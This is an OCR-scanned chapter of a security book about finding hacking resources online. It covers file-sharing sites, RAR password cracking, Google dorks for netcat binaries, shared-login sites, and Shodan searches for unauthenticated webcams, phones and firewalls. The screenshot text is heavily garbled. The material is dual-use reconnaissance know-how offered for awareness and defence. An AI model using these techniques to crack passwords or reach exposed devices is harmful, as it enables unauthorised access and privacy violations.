http://rapidshare.com/files/.. /McGraw.Hill Fedora.Core 7 and.Red Hat. ... 
http://rapidshare.com/files/.../Fedora-13-Alpha-i386-DVD part10.rar, 204.80 MB ... 
www filecatch.com/?g-fedora*7 - Cached 


One thing extremely interesting about rapidshare.com is that at one point it was among the 10 
most visited websites in the world. According to RapidShare, they have 5.4 petabytes of storage. 
That is 5,530 terabytes of storage, which is 5,662,310 GB. To put that in perspective, an electronic 
version of the Library of Congress would take up under 12 terabytes. Sites like rapidshare.com 
and megaupload.com allow users to download a single file for free with little or no wait time. I call 
that the "hook." This won't work when a user needs to download multiple files or parts of a file. 
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, AL " 
Be Edt yew History Bookmarks lods Heb 
e = Œ X & V [T htpiirapdeere.conffies[311912912]mc exe netcat.zp. wi -| B- P| a 


E Most Visted @ Getting Started H Latest Headines 


^* Rapidshare: 1-CLICK Web hosting -E...| = | 


Home | News | Premium Zone | RapidTainment | Rapid support | RapidShare AG | Privacy Pol 


* FILE DOWNLOAD 


http:lirapidshare.comifiles/311912912Inc, exe netcat.zip | 106 KB 


CBsmiemsssr] (T) > 
Do you want to send your files with ease and speed? You can find out how to do that here. ~ 
1. Select Rapids Package — » 2. Payment Options > 3. Activation 


Select Your Preferred Rapids Package: 


RapidShare Buy in your 


Prepaidcard country 400 1000 2000 5000 20000 


Rapids Rapids Rapids Rapids Rapids 
o4 
Tm 4,99€ 9,95€ 19.90€ 49.75€ 199,00€ 
Redeem. county Buy. Buy Buy. Buy Lew 
Done TY S)QO, Tor disabled | 99. Germany 195.122.131.3 Level 3 Communications 72.81.255.124 4 


Once you make an initial download as a free user, your subsequent downloads will require 
longer wait periods. To avoid wait periods, you can sign up and become a premium user. Premium 
users pay a monthly fee and can directly download an unlimited amount of files in a given time 
period. A premium user also has the ability to store files that can be retrieved from any location 
via Internet links. A user’s stored files can be removed if they post the links on the Internet and 
users complain about the material. 


Such file does not exist or it has been removed for infringement of copyrights. 


When a user has a premium account, they can use that to account to store whatever they want. 
Think of the implications of that statement. This allows users to upload and download large files 
from anywhere they have an Internet connection. A user with bad intentions, for example, could 
upload confidential company documents to their RapidShare storage. So, rapidshare.com can be 
used as a method to exfiltrate large amounts of data from the network. 

What amazes me most is that RapidShare has already become ingrained in the mind of today’s 
youth. When I was teaching a class, I directed a student to get a service pack for their system. 
Everyone knows getting a service pack for a Microsoft operating system is as easy as going to 
Microsoft.com and downloading it (at no cost). I saw that student go to Google and type the 
name of the service pack followed by “rapidshare.com.” I could not believe the student was using 
the RapidShare method to obtain their service pack. I then realized that RapidShare is a perfect 
solution for individuals with an instant gratification mindset. 


160 m Defense against the Black Arts 


Users can pass larger files by splitting the files up into multiple segments. For example, if a file 
is 2.7 GB, the user can split it up into 27 100 MB parts. The user will then upload all the RAR 
files and receive a unique RapidShare link for each of the 27 RAR files. Once all 27 RAR files have 
been downloaded by another user, they can join the files using Winrar or 7-Zip. 

To split a large file into several 100 MB RAR files, 


1. Install the latest version of Winrar. 
2. Right click on the file and select Add to Archive. 
3. Choose Zip100 from the Split to volume, bytes drop down box and click OK. 


General | Advanced | Files | B Time Comment E 
Archive name Browse... 
[bt3b141207-1.rar [v] 

Update mode 
[Add and replace files [v] 
Archive format ) Archiving options 
© RAR | C Delete files after archiving 
OZP | | CI Create SFX archive 
' | C Create solid archive 
Compression method C Put authenticity verification 
| Normal M C Put recovery record 
Spa E voa Later C Test archived files 
C Lock archive 


After users have split their file into RAR files and uploaded them to rapidshare.com, they can then 
post the links. A user will need to download all of the RAR files in order to uncompress all of the 
parts and obtain the original file. If a user misses one or more of the RAR files, it is very unlikely 
that they will be able to extract anything usable from the archives. 


Code: 

http: //rapi ,com/files/2024890 08.part0l.rar 
e Aeon c com/ files B .rar 
http: //rapidshare.com/files/2 C Ue, parto3. rar 
http: //rapidshare.com/f 30€ - V2008.part04.rar 
http: //rapidshare.com/files PU TBLV2008.part05.rar 
http: //rapnidshare.com/fileg/o024 Jos BCV2008.part06.rar 
http: //rapidshare.com/fj ee 1083/NIOIRCV2008.part07.rar 
http: //ranidshare.com/fi TNR Ot 0SSCY2008.part08.rar 
http: //rapidshare.com/files"x ESOS ANY EX 8. part09. rar 


Some users also set a password on their RAR files. Passwords are often included on the same 
web page where the links are present. If you do not have the password for the corresponding RAR 
files, you cannot extract the archive. One trick that sometimes works is to just double click on 
the RAR file. In some cases, the password will be displayed right there in the top right pane of 
the screen. 
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= Fly+Crypter+v2.3+++USG-0.7.rar - WinRAR (evaluation copy) 
File Commands Tools Favories Options Help 


ETFITITEIIE4 


Extract To Test View VirusScan Comment 


iB: B Fly-+Crypter+v2. < 34+4+U5G+0.7.rar - RAR archive, unpacked size 3,678,582 bytes be 


assword : www.insecurity.ro 


wnloaded at crazyboris.org 


If the password is not listed on the website or available by double clicking on the file, you have 
two options: 


1. Try to google the name of the file and see if the password, or code, is listed on another 
website. 

2. Use a RAR password cracker. There are free and commercially available RAR password 
crackers. 


To set a password when you are compressing a file with Winrar, perform the following steps: 


1. Right click on the file and choose Add to Archive. 
2. Click on the Advanced tab, and click Set Password. 
3. Click the Show Password box. 

4. Type in the password. 


i— Archive name and parameters 


General | [Advanced | Options | Files | Backup Time | Comment) 
NTFS options Recovery record 


D)Save file security 
O Save file streams 


Volumes - 


e p qm L) 


System 

C Background archiving 

C Tum PC off when done 

[C Wait if other WinRAR copies are active 


To attempt to crack a Winrar password using a RAR password cracker, 


1. Download the program from http://www.rarpasswordcracker.com/rpc412.zip. 
2. Install the program. 

3. Open the RAR Password Cracker wizard. 

4. Click Load Archive, browse to the file and double click on it. 

5. Click Add to Project, click Next. Click OK to the warning. 
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6. Select Dictionary Attack and click Next. 
7. Click Add and add the dictionary file: C:\Program Files\Cain\Wordlists\wordlist.txt. 
8. Click Next. Give the project a name and click the Finish button. 


32 RAR Password Cracker - x 
Startup 

License Free evaluation version 

Project C:\Program Files\Cain\wordlists \yesse 

Archive ohnoz.rar (Password: bamboo) 

Current word banboo 

Words left 280401 

Performance rate — 18(5 p/s) 

Time left 4hc39m 27s 


Advanced Google 


As you know, Google can also be used without using the terms “rapidshare” and “megaupload.” 

But, sometimes just typing in the terms you use for a normal search will not get you what you 
need. Sometimes it can be beneficial to you if you are aware of Google’s advanced operators. A list of 
them can be found at www.google.com/intl/gn/help/operators.html. Operators like link: and site: 
and allintitle: can be used to improve your searching efficiency. A good example of using the 
advanced operators intitle and index.of to locate a specific file is ?intitlesindex.of? nc.exe. 

This method is extremely effective for when I am in a situation where I need to retrieve a 
file quickly. After typing your search, simply click on any of the links provided by Google to 
see if the file exists on the site, then download it. Of course, you could replace the name of the 
file (nc.exe) with anything you want like mp3, xls, doc, and so on. Never use this technique to 
download anything that is copyrighted. 


OO- m Ww. google.com, #hl=en&expids=17259, 17315,23628,23670,25834,26328,26: M] | Bing le 


i Ele Edit View Favorites Tools Help 

ix € 

‘We Favorites [A orttleindex.cf? nc.exe - Google Search i A- C3 de + Pages Safety> Toos- ®@- 
Web images Videos Maps News Shopping Gmail more v Web History | Search settings | Sign in 


Google | ?intile:index. of? nc.exe| x |Search | "mtem 


About 311 results (0.12 seconds) Advanced search 


$I) Everything Index of /tools Sponsored links 
@ Images nc.exe, 03-Jan-1998 20:37, 58K. [ ]. pugne exe, 26-Apr-2006 06:32, 80K. [ J, Gi Search liance 
g notepad-2k.exe, 09-Mar-2001 06:39, 50K ... Always find the files you need - 
lili Videos test.saurik.com/tools/ - Cached - Similar Try the Google Search 
Appliance! 


| More Index of /networksa/tools www google com/gsa 
ms-sql.exe 12-Aug-2009 09:46 160K [ ] msrdpcli.exe 12-Aug-2009 09:46 3.3M 

[v) Show search tools [TXT] mysql.c 12-Aug-2009 09:46 8.7K [ ] nc.exe 12-Aug-2009 09:46 58K [ ] ... See your ad here » 
examples oreilly.com/networksa/tools/ - Cached - Similar 


Index of /free 

nc.exe, 07-Jul-2008 17:45, 60K. [ ], obm.exe, 26-Mar-2008 12:05, 26M. [ ], 
ocs mac agent.dmg, 05-Dec-2007 09:41, 550K ... 
updates.lemon-computing.com/free/ - United Kingdom - Cached - Similar 


Index of /toolz 

mactheripper 266.dmg. zip 24-Sep-2007 14:41 1.1M [ ] nc.exe 28-Oct-2005 
18:44 58K [ ] odbg110 zip 10-Jun-2005 19:36 1.1M [] ... 
www.bacik.org/toolz/ - Cached - Similar 


Index of /downloads 
26-Dec-2007 22:00 28k [ ] nc.exe 28-Dec-2007 17:43 58k [ ] nimdaten zip 15- 
Jul-2008 18:58 7k [ ] pwdump4 zip 15-Jul-2008 18:58 72k [ ] ... 
— hlacknite eu/downlnads/ - Cached - Similar _ 
A 
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Of course, you can also use this technique to verify that your company's software or informa- 
tion is not indexed within Google. Security professionals can use these techniques to find out if 
some type of data leakage has occurred from their organization. By being aware of how hackers 
use Google, you can better protect your organization. Other interesting things can be found 
within the Google hacking database, which is maintained by Johnny Long at the website http:// 
www.hackersforcharity.org/ghdb/. Johnny has authored several top selling books and has used his 
notoriety to help promote his charity, Hackers for Charity. 

To use the Google hacking database, 


1. Open your browser and go to http://www.hackersforcharity.org/ghdb/. 

2. Click on any of the white hyperlinks in the list, for example Files Containing Passwords. 

3. Examine the titles within the particular subcategory, then click the blue and white “i” but- 
ton in the right hand column. 

4. Clicking the white hyperlink will take you into Google with that search. 


5. You may have to scroll through several pages of search results in order to find some decent results. 


eus | GHDB - Windows Internet Explorer m [2] [x] 


go- e hackersforcharity.org iv] & | +9|| x) |o Pr 
Ele Edt yew Favorites Tools Help 

x €à- 

Ü Favortes | @@ mhs | GHB A- A- vs paer Sofety~ Tos- @- ” 


You can use the Google hacking database search terms in conjunction with the site: parameter 
and list the website of your company. This can assist you in checking for data leakage. 


YouTube 


YouTube is now owned by Google and has more videos than any person could watch in a lifetime. 
If you need directions on how to hack something, youtube.com has many videos that will give 
you a step-by-step tutorial. There are so many specializations within computers, such as forensics, 
databases, programming, and networking, that no one person can know everything. It is a great 
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skill to have if you can write your own scripts or compile your own "hacking binaries." However, if 
someone already created a tool or figured out a way to hack a system, using their tools or methods 
may save you valuable time. The saying goes, “Why reinvent the wheel?” 


m] 
oll Tube hack vista Search Browse Upload 


Hack Vista 


v. 


Jessevarsalone 1 videos +) Subscribe 


Using BackTrack 
to Own 
Windows Vista 
(Physical Access) 


> Varsalone 


jessevarsalone 
The hack allows you to gain SYSTEM access to VISTA which is actually one leve. views 


And, YouTube is not the only website that has videos. There are lots of other sites out there, 
such as Vimeo.com, which aggregate a large number of videos that can be useful for you when you 
are trying to solve the hacking puzzle. If you find a way to hack into something, consider creating 


c Monthly Briefings - February 2009 - Jesse Varsalone on Vimeo 


Feb 28, 2009 
DojoSec Monthly Briefings - Feb 2009 - Jesse Varsalone 


g vimeo.com/3410674 - more videos 


a video and uploading it. This way the community can learn and grow from your insight. 
Sometimes you do not have to search for anything. It is already there for the taking. Or, better 
yet, there is already a Firefox application there to assist you in your process. A perfect example of 
this is the Video Download Helper. This add-on will allow you to download the flash video (FLV) 
files that are stored on YouTube, so you can watch the videos offline. If you use this tool, be sure 
not to violate the terms of service of YouTube. 
To install Video Download Helper, perform the following steps: 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. 

4. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for Video Download Helper within all add-ons. 

6. Click the Download Now button. 

7. Click Install Now and restart Firefox. 
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Register ot Login Other Applications * 


A. video downloadhelper 


Add-ons for Firefox » Search 


Refine Renulte Search Results 
Compatible with Showing 1 - 18 of 18 results for video downloadhelper 


| Keyword hwest tame Rating Popularity 


[7 Video DownloadHelper 
by mig 


The easy way to download and convert Web videos from hundreds of YouTube-Kke 
sies 


Categories 
»AN 
Extensions 
Alerts & Updates 


à f SQ Tordissbled f Unked States 63.245.209.91 Mozila Corporation 72,81.255.124 


Once you have the Video Download Helper add-on installed, open Firefox and go to the website 
youtube.com. Click on the video of your choice and play it. Once the video starts to play, the 
Video Download Helper icon (located directly to the right of the home picture) will become ani- 
mated. Click on the arrow to the right of the Download Helper icon and click Save. 


(D vouTube -Wewvoe UR yenebom - Mozilla Firefox ~= 


Ele Edit wew History Bookmarks Tools Help 


OT cx als- 


(Bi) Most Visited > Getting Started [ 


(8. https jw youtube.comresults?search_query=rows 
= — , 


Most of the files you download will be in FLV format. However, sometimes you will have the 
option to download the video as an MP4. Once you have the file, there are several free programs 
you can use to convert the file to any format you want, including an MP3: 


B FLV to Video Convertor Pro 2 by Moyea, available from flvsoft.com/flv_to_mp3. 
W Free Máa to MP3 Converter by ManiacTools, available at maniactools.com/soft/ 
m4a-to-mp3-converter. 


To convert an FLV file to an MP3, 


1. Download FLV to Video Convertor Pro 2 by Moyea from flvsoft.com/flv to mp3. 
2. Install the program. 

3. Open the program. 

4. Browse to the location of the FLV file. 

5. Select the Output folder. 

6. Click the Play button in the lower right-hand corner. 
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O Moyes FLV to Video Converter Pro 7 


Vue Nr 


News Servers 


Hackers also use tools such as news servers to obtain software packages, 
and MP3s. News servers were not designed for the purpose of hosting il 
some people have decided to use news servers as a venue for distributing 


vices such as giganews.com give users the ability to store and download large amounts of files. For 
about $30 a month, users can download an unlimited amount of files using 256 bit secure sockets 
layer (SSL) encryption. Users who are using the diamond service are most likely downloading 


more than 50 GB of files per month. The SSL and VyprVPN service allow users to encrypt their 
for law enforcement. In 


even offer tech support, 


connections, and that makes tracing what they’re doing more difficult 
order to use the Giganews service, you must install their software. They 


and a free trial for users who want to test their product. Of course, Giganews does not encourage 


users to post or download illegal material. 


books on PDF, movies, 
legal software; however, 
illegal software. Pay ser- 


Usenet N 


G9- v 
Be Edt yem Faure Tools Heb 
x €&- 


ly Favortes 


A- A-O Grue 


[S Usenet Newsgroups Service, News Servers, Usenet A... 


+ Safety Tools Q- 


v: [Loge P: 


Newsgroups. Nonstop.” 


PRICINGISIGNUP WHY GIGANEWS® USENET? MEMBER BENEFITS SPEED/TRACEROUTE MELP/AQ CONTACT kadi 
ABOUT US ISP SERVICES COMMENTS AFFILIATES REFERAFRIEND NEWS BLOG AUPITOS 


E mae | 


^ 


[ SEARCH 
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DIAMOND 
inlimited + SS, 
Browse the Internet, Don't eani 7 
Let the Internet Browse You v 
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Finding It All on the Net WM 167 


BitTorrent 


BitTorrent is another tool that hackers use to find and distribute illegal software. BitTorrent 
can be used by companies for the purpose of conducting legitimate business. A large number 
of VMware appliances can be downloaded via BitTorrent. Internet service providers (ISPs) may 
block BitTorrent traffic because of the large amount of illegal software that is distributed though 
its use. The ISPs are also concerned because BitTorrent users are responsible for consuming a large 
percentage of the company's bandwidth. The large amount of bandwidth consumed by BitTorrent 
users results in "legitimate users" having slower Internet connections. 

Vuze, formerly Azureus, is a free Java BitTorrent client that allows users to connect to a very 
large network of users sharing files. The files are not located on one central server; users actually 
get small parts of the whole files from users throughout the BitTorrent networks. It is difficult to 
trace where the files have come from because they are distributed from computers throughout the 
world. This is why BitTorrent is a popular choice among hackers. 

There are websites, such as http://www.thepiratebay.org, that have torrent files. This site has 
torrent files for music, movies, and software. Hackers download the torrent files and then use a 
program like Vuze to retrieve the software packages, books on PDF, movies, and MP3s. Sites that 
host torrent files, such as thepiratebay.org, do not have any of the music, movies, or illegal software 
on their servers. Sites like these merely provide torrent files that will allow users with a BitTorrent 
client, like Vuze, to download small parts of the files from other BitTorrent clients. 


ai Download music, movies, games, software! The Pirate Bay - The worlds largest BitTorrent tracker - Microsoft Internet Explorer 
Ble Edt View Favorites Tools Heb Lj 


O=- O- HAD D-36028 .80034 


Address d) htto://thepiratebay.org/ 


UN 


The Pirate Bay 


Mian C Audio [video C Applications [Games [other C (search titles only) 
Pirate Search |(__ImFeelingLucky | 


How do I download? 


CE 


Multiplication can produce powerful numbers @ Piratbyrån 


\¢ 


Other Options 


Many users get a lot of their information about hacking from various forums. There are often areas 
where newbies (noobs) can post questions to users with more advanced skill sets. When you are 
new to a forum, it is often best just to hang out and read some posts for a couple of days before 
you post something. Take special note of how posts from individuals new to the forum are either 


168 m Defense against the Black Arts 


accepted, rejected, or ridiculed. Be sure to do some research before making a post as members tend 
to become annoyed by people who post questions that have already been asked multiple times. 
Another good piece of advice about forums is to try to give back and post answers to questions you 
know (like content covered in this book) or send private messages to some of the more knowledge- 
able posters. Try to gain their trust and get the answers you need from them. And, although I hate 
to ever do this, you might have to spend a little bit of money by giving a donation in order to get 
the information you need when you are first starting out. 


Krank , About He | Blog 
Senior Member 
Wiiacks Staff Statistics 
Junior Moderator 
Virtus Welcome Agent Total Posts 
Only site donators may send a PM to Total Post 4859 
Wittacks Staff Posts Pe y 18.60 
M Fed al poss Total Thanks 
MP red al started trends Total Thenks: — «s 
BB ven vidus Thanked 1,332 Times in 1,016 Posts 
B view tog Eves General Information 
as ty 


Today 06:23 PM 
01-13-2010 
3 


Many people who planning on a career in information technology (IT) look on pursuing 
various IT certifications. A great place to start is in an IT certification forum like sadikhov.com. 
Forums like Sadikhov can give individuals ideas about what materials to study to pass their cert- 
ifications and helpful hints about exams like the number of questions and various other hints that 
will assist with preparation. Go into these forums and read the posts related to the certification 
you are interested in pursuing. Sign up and ask other users what materials they used to prepare for 
their exam. The best way to achieve success is to ask those who have already passed the exams and 
model the behaviors that made them a success in their endeavor. 

Some sites require logins, which you can simply obtain by registering and then clicking on 
a confirmation link in your email. Sometimes there may be a situation where sites won't let you 
register or you do not feel like giving away your email address. ‘There are sites like www.login2.me 
which have generic user names and passwords. I would NEVER this type of site. You can go to 
this site and type the website you need a login for, and it will provide you with a username and 
password if it has one for that site in its database. 


QO- Enn EN HSA ess - — — Jer 
Ele Edt Yew Favortes Tools Help 

x @- 

We Favorkes | I? Free logi to any ste fO Coh Pager setyo Tooke @- C 


Popular Manuals Manuals Alphabet deenifr/es/ip/ru 


. Enter url or site name which is required to enter login and password: 
Login 2 — oco = 


Free login to any site, more Login: geathedéa@gmail.com 
Password: jealeutitiitfe 


Not working, show more 


Tip: to copy login or password click on them 
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Firefox has an add-on called BugMeNot that also provides a username and password for you 
when you go to a website that requires any type of registration. I would caution against using a site 
like login2.me or a tool like BugMeNot for many reasons. Most sites have terms of service agree- 
ments that do not allow multiple people to share accounts. Another concern is that if you use an 
account like this and share it with another person who is doing something illegal, law enforcement 
may trace the account usage back to your IP address and come around and start asking questions. 
It is, however, important to know that sites like this exist out there and that hackers are using them 
to their advantage. You could take the other road and use a site like this to ensure that account 
information, such as usernames and passwords, have not leaked to the Internet. 


Add-ons for Firefox > Extensions > BugMeltlot 


@ BugMeNot 2.2 


dem tm Bypass compulsory web registration with the context menu via www.bugmenot.cc 


"c . Continue to Download — View privacy policy 


Updated September 14, 2009 
Website http://bugmenot.com 
Works with Firefox 20 - 3.6.* 


Add to collection 


Twitter is a great tool to keep your skills current and follow trends in the field. There are several 
users whose tweets have provided me with valuable information about current trends in hacking. 
Users post 140-character or less tweets about vulnerabilities, exploits, and other important infor- 
mation related to IT. I was skeptical at first also, but it is great. 


E. mushy$99 Reg Hardware Reviews Digest: http //bit ly/chF rM 
E mushy99 Why is IBM declaring war on Cisco? ntt; 
E mushy99 iPad spends 20% of time in bed: http //bit ly/ahQLLN 


Some of the people I follow who post a lot of good information include 


mushy99 
mubix 


carnal0wnage 
HDMOORE 


There are two methods to contact someone: via a direct message or through a mention. You only 
have the ability to send someone a direct message if they are following you. You can mention anyone 
by clicking on a person’s name; then the @ symbol will appear in front of their name in your tweet. 

One thing you need to be careful about when using Twitter is the shortened links that users 
often tweet when they are trying to refer you to a website. Websites like www.bit.ly allow users to 
create shortened links that can easily be posted in 140 characters or less. Be cautious when click- 
ing on these links, as they could take you to websites that have inappropriate or even malicious 
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content. Someone could easily build trust with their Twitter followers by posting hundreds of 
legitimate links, then post a single bad link. 


Shorten with bit.ly 
http://www_baltimoresun.com/business/bs-bz-constellation-calvert-1009-20 


Your Link >  http//bitly/b5r4yk Sign In to Share Or Customize 
Long Link http-/^w 


http://www. baltimoresun.com/business/bs-be-consteliation-calvert-1009-20101010,0,7592937.story 


w'w.baltimoresun com/busin. 


While forums are a great way to communicate with others on the Web, they do not always 
have people waiting around in real time. If you do not have time to search though forums or don't 
have the patience to wait for people to reply to your posts, you may want to try another method 
to communicate with other knowledgeable individuals, like Internet Relay Chat (IRC). Average; 
everyday users tend to shy away from IRC, which makes it a great way to communicate with some 
more advanced and knowledgeable users. 

Various tools can be used to connect to IRC servers including mIRC, Pidgin, Opera, and the 
Firefox add-on Chatzilla. You can learn a lot from hanging out and talking to other people in IRC 
forums. There are IRC rooms you can join for Wiihacks, Metasploit, and BackTrack. One of the 
best tools that any hacker or penetration tester can use is Metasploit, which is covered in Chapter 11. 
By hanging out in the Metasploit room on the irc.freenode.net IRC server, you can learn about 
Metasploit by listening to other users or asking questions. 

To use the Metasploit IRC room, 


1. Install the latest version of Firefox. 

2. Open your Firefox browser, and type http://www.google.com in the address bar. 
3. Search for add-ons. 

Á. Click on the link for Firefox add-ons (should be the first hit). 

5. Search for Chatzilla within all add-ons. 

6. Install the add-on, then restart Firefox. 

7. From the tools menu of Firefox, select Chatzilla. 

8. In the dialog box, type /server irc.freenode.net. 

9. In the dialog box, type /join #Metasploit. 
10. You should be connected to the Metasploit room on www.irc.freenode.net. 


URL ire://freenode Mode +Cctz Users 200, 8@, 0%, 0+ 
{Metasploit 

Topic 3.4.1=RELEASED Docs: http://metasploit.com/framework 
/support Course: http://www.offensive-security.com/metasploit- 
unleashed/ Express: http://www.metasploit.com/express/ 
Classes: http://www.metasploit.com/ 


Express: http://www.metasploit.com/express/ Classes: 

http: //www.metasploit.com” 

Topic for #Metasploit was set by hdm!~hdm@about/secunity/ 
stafPhdm on Friday, August 20, 2010 12:50:33 PM 

Conference Mode has been enabled for this view; joins, leaves, quits 
and nickname changes will be hidden. 


*imetasploit http://metasploit.com/ 
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Users who have Linux can use the curl command in conjunction with grep to parse through web 
pages for specific terms. It can be very helpful if you are searching thorough a site or forum for a 
specific term or phrase. Sometimes lazy administrators or coders leave information in the HTML 
code that will not be revealed to users who do not examine the source code of the page. Curl will 
grab the source code of the web page, and grep will allow you to search for a specific hidden term 
like password or username. 


Awesome Web Page - Mozilla Firefox 


Ele Edit View History Bookmarks Tools Help 
€ ~- 3 O Q[S9nnsz191923 7 |i 


9| Remote-Exploit [A Offensive-Security jj RE Forums [6] Metasploit 


Home Page 


Super Secure web site 


Best Web Site Ever 


To use curl and grep, 
1. Boot to any distribution of Linux. 


2. Type curl http://IPorFQDNofthesite | grep password. 
3. If che word login is listed anywhere within the source code, it will be displayed. 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


ShodanHQ.com 


Unlike Google, ShodanHQ is a computer search engine. By examining the response of the devices 
it contacts on the Internet, a user is able to gain information about the site, such as 


B The target OS 
The version of web server software 
— Apache 


— Internet Information Services 


If default passwords and usernames are being used 
Identify webcam devices 

Identify network printers 

Identify firewalls 

Identify voice-over-Internet protocol (VoIP) devices 
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The shodanhq.com website will allow you to search for computers running specific versions of 
software or with specific ports open. It is also possible to search for certain hostnames or within a 
specific country. To use the country search filter, you are required to log in (free account). I recom- 
mend that you create an account in order to make the most effective use of the site. Some of the 
search filters include 


Port 

Operating system 
Server software 
IP address ranges 


When you go to the site, click the arrow below the word register to filter by the following services: 


B Hypertext transfer protocol (HTTP) 
W File transfer protocol (FTP) 

B Secure shell 

B Simple network management protocol 


EE EEE 


Filter by Country 


Filter by Service 


W onpon W ssh (22) LEES Ju 


If you are not sure what to search for, you can always go to www.shodanhq.com/browse to see 
some of the most popular searches. As you will see, some of them are very intriguing. 


“SHODAN oa 
Browse All Searches 


Popular Searches b] 
default password 
inds resul 3efauh 


router default password 


cisco-ios last-modified 
i E ir ios cisco last modified for free 
Webcam 
e dads webcam surveillance cams 
netgear 
dreambox 
cm dreambox 
Router w/ Default Info 
HEURE router http default 

IOS HACK - old 
i i ha ata, los cisco 
Snom VOIP phones with no authentication 
i RO DO E EO voip http authentication 
webcam VIDEO WEB SERVER 

M webcam ipcam 
FTP anon successful 
EAS B m i mE zx: " " plaina access granted 
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Some of the interesting results include 


Default passwords 

Webcams 

Routers with default info 

Snom VOIP phones with no authentication 

Netgear routers with user Admin and password of Password 
FTP sites allowing anonymous access 


Now, if you chose to click on any of these websites and went as far as logging in to these systems 
with the default of username Admin and password of Password, I would go as far as to say that you 
are committing a crime. Even though the device has not been properly secured, there is very little 
chance that the operator of the device wanted you to access it. However, if you click on the link, 
and no authentication is required whatsoever, you can probably view the page. 


HTTP^1.0 200 Ok 

Server: snom embedded 
Content-Type: text/html 
Cache-Control: no-cache 
Cache-Control: no-store 
Content-Length: 9366 


HTTP71.0 200 Ok 


Server: snom embedded 


Content-Type: text-html 
Cache-Control: no-oache 
Cache-Control: no-store 
Content-Length: 8427 


For example, if you click a link to a VOIP phone with no authentication, you are sent directly 
to the phone page. No authentication is required whatsoever. From this interface, the user can 
make calls and delete and edit dialed numbers. 


CO Oare 9 (8) (+)(x] Be II 
Ele Edt View Favortes Tools Help x, 
xi Favorites — |) snom 300 l = i f BC dh Pes Softy Tose Q- 


version 7 


A HTTP Password m 
Home This web interface makes it easy for you to set your phone up correctly and to access the 
Directory advanced features. 
Setup To dial a number, just enter the number in the field below. You can enter a simple telephone 
lm number (e.g. 0114930398330) or URI like info&snom.com. 
eL Dial a Number: 
Function Keys Dial  Hangup 
Identity 1 
Identity 2 Outgoing Identity: 
Identity 3 | 2 idonea com V Set 


Identity 4 
Action URL Settings 
Dialed, Missed, Received 


Advanced 
Trusted Certificates 
Software Update 
Status Dialed Numbers X 
Syd 1nlorietion Date Time Duration Costs: Local Identity Number 
Log 10/27/2010 2:54PM 7:57 Se, 01453800. - x 
SIP Trace rr: : 
10/27/2010 ^ 2:33PM 6:47 : mr TB x 
DNS Cache xs mac it.com 
Subscriptions 10/27/2010 2:10PM 1:36 -—-— Oise — x 
PCAP Trace n " 8st SOMNI ^ 
wea 10/27/2010 2:04PM. 0:59 SS 02MM! — x 
Settings 10/27/2010 1:45PM 1:37 € cs ` x 
Manal 10/27/2010 1:41PM_2:03 ed ay x 


Getting into someone’s phone without any authentication is bad. Being able to view their 
webcam might even be worse. There are several version of webcams listed in Popular Searches. 
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Popular Searches 53 
imar10 Synology Disk Station 


http-//www.synology.com/us. 


DD-WRT 


Atheros and Broadcom chipset routers (Linksys, Fonera and others). Default credentials: root admin 


7 APR 1 DCS-5220 
DLink web cameras fem 


When you click on the link, you are presented with a list of IP addresses and their banner 
messages. Some of the links will ask for a username and password and others will not. In order to 
properly view the webcams, you may be required to install a plug-in for Internet Explorer. Notice 
that the ability exits to move, maintain, and change the setup of the webcam. 


/C DCS-5220 IP camera - Windows Internet Explorer Lax 
Go EMERE [HE 


Eje Edt View Favorites Toos Hep E x@ 


Wi Favortes | @pcs-5200 IP camera 


This section shows your camera's ive video. You can control your settings using the buttons below. 
Current resolution i 640x48 


LIVE VIDEO 


In many cases, people do realize that they are being watched on camera in a store. They prob- 
ably do not realize that anyone on the Internet can watch them make their purchase. In this case, 
I wish this guy would buy something already. And people call me indecisive. 


This section shows your camera's Ive video. You can control your settings usng the buttons below. 
Current resolution is 640x480. 


LIVE VIDEO 
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I do understand the need to protect a company's finances by watching the transactions at the 
register. But, the whole Internet should not be watching. Bad people might do bad things. 


It would be a good idea if people protecting their networks enabled a firewall. That will make 
their network more secure from attackers. However, a firewall without a required username or 
password will not be very effective as anyone who locates the site will be able to make changes. 


Firewalls 
There are a number of mostly 
Security page and the pas 


ki 


Ich, still allows access without authentication. Passwords still on vew source page (where implemented). - date - 


ich Guard firewalls which do not require credentials t 
in be viewed in the page source though It is not requi 


nnect to the web administration page. Some have cre 


In this case, users will have unrestricted access to the firewall control panel because the admini- 
strator forgot to require authentication; anyone from the Internet can now configure it. 


/^ WatchGuard Configuration Settings - Windows Internet Explorer 


E : 
to] EE oo 


Ele Edt View Favorites Jools Help 


oly Favorites | Æ WatchGuard Configuration Settings 


External 

Trusted 

Optional 

Routes 

Dual ISP 

Network Statistics 

DynamicDNS 
Administrabon 

System Security 

VPN Manager Access 

Update 

Upgrade 

View Configuration File 
Firewall 

Incoming 

Outgoing 

Custom Service 

Blocked Sites 

Firewall Options 

Pass Through 
Logging 

WSEP Logging 

Syslog Logging 

System Time 
WebBlocker 
VPN 


SOHO 6 Configuration 
System Status 


Welcome to the SOHO configuration site. The standard configuration provides basic protection 
against network security attacks. Through this sie you can customize the SOHO to meet your specific 
security needs. 


If you need assistance, review the Help pages for information about this release or review the Online 
Documentation. 


Component Version Feature Status. 
Firewall 63 WSEP Logging Disabled 
Sep 25 2003 
build 19 VPN Manager Access Disabled 
Boot ROM 55 


Platform WatchGuard SoHo6 = 28109 Enabled 


SerialNumber Sa Pass Through Disabled 


Option Status 
User Licenses 25 


Remote Gateways Not Installed Upgrade 
MUVPN Clients Not installed Upgrade 
WebBlocker Not Installed Upgrade 
Dual ISP Not Installed Upgrade 


VPNforce Not Installed 


Firewall 
IP Address 192.168.111.1 Outgoing Semice Incoming Mode Manual 
Subnet Mask 255.255.255.0 => Outgoing IP Address Aan 
DHCP Server Disabled => NetMeeting 4m Subnet Mask 25525525544 
FirstiP 192.168.111.2 Gateway RARER 
mac questi um — 
HP = 
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Printing is important to every organization and company. It is probably not a good idea to 
leave your device wide open so anyone from the Internet can connect to configure your device. 


11 JAN 10 JetDirect HP Printer 
JetDirect HP Printer running FTP 


With printers, IP addresses are not linked. The URL needs to be manually typed in the browser. 


Details 


MP ETHERNET MULTI-ENVIRONMENT, ROM P.22.01,JETOIRECT, JO96, EEPROM P.24.67,CIDATE 12/13/2002 


Details 


